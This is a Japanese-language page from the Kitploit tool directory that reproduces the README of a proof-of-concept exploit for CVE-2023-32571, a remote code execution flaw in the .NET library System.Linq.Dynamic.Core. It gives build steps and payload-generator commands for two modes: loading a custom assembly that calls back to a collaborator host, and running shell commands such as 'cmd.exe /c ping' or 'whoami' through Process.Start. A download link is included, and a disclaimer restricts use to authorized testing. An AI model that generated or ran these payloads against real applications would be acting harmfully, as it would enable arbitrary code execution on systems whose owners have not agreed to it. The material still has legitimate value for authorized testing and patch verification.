Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-32571 — CVE-2023-32571 の概念実証 | Kitploit
ツール/GitHubGitHub/sectex/cve-2023-32571
ペイロード生成脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用学習と教育
GitHubsectex/cve-2023-32571

CVE-2023-32571

CVE-2023-32571 の概念実証

リポジトリを見る
10ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🐞 CVE-2023-32571 - System.Linq.Dynamic.Core リモートコード実行

CVE-2023-32571 の Proof of Concept です。System.Linq.Dynamic.Core (1.0.7.10 から 1.2.25) におけるリモートコード実行の脆弱性です。この脆弱性により、Where、Select、OrderBy などのメソッドに信頼できない入力が解析された場合、攻撃者は任意のコードやコマンドを実行できます。

⚠️ 免責事項

このツールは 教育および許可されたテスト目的のみ で提供されます。事前の相互同意なしにターゲットを攻撃するためにこのツールを使用することは違法です。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害についての責任を負いません。

🎯 前提条件

  • .NET 9.0 SDK 以降
  • 脆弱性のあるバージョンの System.Linq.Dynamic.Core (1.0.7.10 から 1.2.25) を使用しているターゲットアプリケーション
  • コールバックを観測するためのコラボレーターサーバー (例: Burp Collaborator、Interactsh)

🛠️ プロジェクトのビルド

  1. プロジェクトをビルド:
    root@kitploit:~
    dotnet build --configuration Release
    
    ビルドにより以下が生成されます
    • Payload DLL: Payload/bin/Release/netstandard2.0/Payload.dll
    • Payload Generator: Generator/bin/Release/net9.0/Generator.dll

🚀 使用方法

モード

このツールは2つのモードをサポートしています:

  1. AssemblyLoad (モード0): カスタム .NET アセンブリをロードして実行
  2. ProcessStart (モード1): Process.Start を介してシステムコマンドを直接実行

モード0: AssemblyLoad (デフォルト)

root@kitploit:~
# Base64 エンコーディングを使用
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 1

# Hex エンコーディングを使用
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 0
root@kitploit:~
# Base64 エンコーディングを使用
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 1

# Hex エンコーディングを使用
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 0

モード1: ProcessStart (直接コマンド実行)

root@kitploit:~
# Windows コマンド実行
./Generator --mode 1 --parameters "cmd.exe /c ping <your-collaborator-url>"

# Linux コマンド実行  
./Generator --mode 1 --parameters "bash -c ping <your-collaborator-url>"

⚙️ パラメーター

  • --mode: エクスプロイトモード (0=AssemblyLoad, 1=ProcessStart)
  • --file: ロードする .NET アセンブリのパス (AssemblyLoad モードで必須)
  • --type: インスタンス化する完全修飾型名 (AssemblyLoad モードで必須)
  • --parameters: モードに基づくパラメーター:
    • AssemblyLoad: コンストラクターパラメーター (カンマ区切り)
    • ProcessStart: 実行するコマンド (例: 'cmd.exe /c whoami' または 'bash -c whoami')
  • --encoding: AssemblyLoad モードのエンコーディング方式 (0=Hex, 1=Base64)

📚 参考文献

  • NIST NVD
  • NCCGROUP Advisory
  • System.Linq.Dynamic.Core GitHub Repository
ツールをダウンロード